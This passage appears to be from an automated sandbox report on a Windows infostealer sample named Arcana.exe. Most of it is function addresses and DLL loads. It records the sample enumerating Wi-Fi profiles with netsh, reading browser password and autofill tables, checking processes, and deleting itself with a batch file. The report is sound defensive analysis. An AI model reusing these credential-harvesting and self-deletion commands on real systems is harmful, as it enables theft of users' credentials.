          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D30EF00_2_04D30EF0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D378300_2_04D37830
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D338280_2_04D33828
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D309800_2_04D30980
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D3E7330_2_04D3E733
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF45530_2_05DF4553
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFB5700_2_05DFB570
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF60D80_2_05DF60D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF0D00_2_05DFF0D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF8800_2_05DFF880
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFDCA00_2_05DFDCA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFAFD80_2_05DFAFD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF076F0_2_05DF076F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF4F680_2_05DF4F68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF6AD80_2_05DF6AD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFCEE00_2_05DFCEE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF9A880_2_05DF9A88
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF26A00_2_05DF26A0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF0E780_2_05DF0E78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFCA700_2_05DFCA70
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF1A100_2_05DF1A10
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF3A2F0_2_05DF3A2F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF7D480_2_05DF7D48
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFB5600_2_05DFB560
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFDC900_2_05DFDC90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF80480_2_05DF8048
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF8730_2_05DFF873
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF0700_2_05DFF070
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF8700_2_05DFF870
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFA7D00_2_05DFA7D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF9FD00_2_05DF9FD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFA7C40_2_05DFA7C4
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF9FE00_2_05DF9FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF53B80_2_05DF53B8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DF2F180_2_05DF2F18
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFCECF0_2_05DFCECF
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082575200_2_08257520
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08250D280_2_08250D28
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825BA300_2_0825BA30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825B9100_2_0825B910
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825E5100_2_0825E510
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825D5180_2_0825D518
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825DF600_2_0825DF60
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08251A680_2_08251A68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08259C680_2_08259C68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825CF680_2_0825CF68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C0700_2_0825C070
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08257F780_2_08257F78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082500400_2_08250040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08256FE00_2_08256FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8E80_2_0825C8E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825EDC00_2_0825EDC0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08251A300_2_08251A30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8E80_2_0825C8E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825CF570_2_0825CF57
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8A10_2_0825C8A1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825EC980_2_0825EC98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08256FD10_2_08256FD1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AF49A0_2_082AF49A
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AC5100_2_082AC510
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A5E680_2_082A5E68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A7AE00_2_082A7AE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A65C00_2_082A65C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A76400_2_082A7640
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A97580_2_082A9758
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A20500_2_082A2050
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AADB80_2_082AADB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A4A380_2_082A4A38
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AB00A0_2_082AB00A
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0A800_2_082A0A80
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AEB980_2_082AEB98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082ADE9E0_2_082ADE9E
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0A900_2_082A0A90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A9EE00_2_082A9EE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AA9600_2_082AA960
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A13F00_2_082A13F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A10C80_2_082A10C8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A97480_2_082A9748
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A00400_2_082A0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0FC70_2_082A0FC7
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A7AD20_2_082A7AD2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AA8500_2_082AA850
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083144180_2_08314418
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083142600_2_08314260
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083158410_2_08315841
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083100400_2_08310040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083100120_2_08310012
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08312A580_2_08312A58
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08312A460_2_08312A46
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B38660_2_083B3866
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BB4A80_2_083BB4A8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B08F00_2_083B08F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BF1200_2_083BF120
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BFDA00_2_083BFDA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B4D950_2_083B4D95
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2A400_2_083B2A40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BEAB80_2_083BEAB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BE3300_2_083BE330
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B7B100_2_083B7B10
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57900_2_083B5790
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B33E20_2_083B33E2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B001E0_2_083B001E
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BC0780_2_083BC078
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BE0600_2_083BE060
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B00400_2_083B0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BD8B00_2_083BD8B0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCC970_2_083BCC97
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B08EA0_2_083B08EA
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BECD80_2_083BECD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCCD80_2_083BCCD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BECC80_2_083BECC8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B18C00_2_083B18C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B15320_2_083B1532
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B21780_2_083B2178
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2D980_2_083B2D98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BFD900_2_083BFD90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B21880_2_083B2188
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BC9F80_2_083BC9F8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2A300_2_083B2A30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B02E00_2_083B02E0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCB3C0_2_083BCB3C
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCB280_2_083BCB28
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B1B020_2_083B1B02
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57640_2_083B5764
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BBB400_2_083BBB40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8FA00_2_083B8FA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BDB800_2_083BDB80
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8FE00_2_083B8FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B3FD00_2_083B3FD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8BD00_2_083B8BD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E24580_2_085E2458
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E00400_2_085E0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5A780_2_085E5A78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5C190_2_085E5C19
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E520B0_2_085E520B
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EF4D80_2_085EF4D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5ED50_2_085E5ED5
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E96D00_2_085E96D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E7AE80_2_085E7AE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E6EE80_2_085E6EE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EBE880_2_085EBE88
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5D500_2_085E5D50
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E83480_2_085E8348
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E45F00_2_085E45F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E75900_2_085E7590
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E4E520_2_085E4E52
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E622C0_2_085E622C
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EEC200_2_085EEC20
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E6EDA0_2_085E6EDA
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EF4C70_2_085EF4C7
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E66E80_2_085E66E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E9EE30_2_085E9EE3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E189F0_2_085E189F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E9ABD0_2_085E9ABD
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E4AA50_2_085E4AA5
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E62A00_2_085E62A0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E755D0_2_085E755D
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E57420_2_085E5742
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E7B410_2_085E7B41
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E616F0_2_085E616F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E1D680_2_085E1D68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EC7080_2_085EC708
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EAFD80_2_085EAFD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EEFE80_2_085EEFE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E57880_2_085E5788
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57800_2_083B5780
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1512294678.000000006FEEB000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1493209045.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmpBinary or memory string: lastOriginalFileName vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000000.1310881238.0000000000398000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameArcana.exe. vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exeBinary or memory string: OriginalFilenameArcana.exe. vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: bPkG0wTVon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/21@2/2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_05DFF0D0 CreateToolhelp32Snapshot,0_2_05DFF0D0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8592
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:120:WilError_03
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile created: C:\Users\user\AppData\Local\Temp\lljh0ipr.tbfJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: bPkG0wTVon.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 8592)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C6000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002915000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FC000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, tmp918A.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
          Source: bPkG0wTVon.exeVirustotal: Detection: 30%
          Source: bPkG0wTVon.exeReversingLabs: Detection: 52%
          Source: unknownProcess created: C:\Users\user\Desktop\bPkG0wTVon.exe "C:\Users\user\Desktop\bPkG0wTVon.exe"
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeSection loaded: winnsi.dllJump to behavior
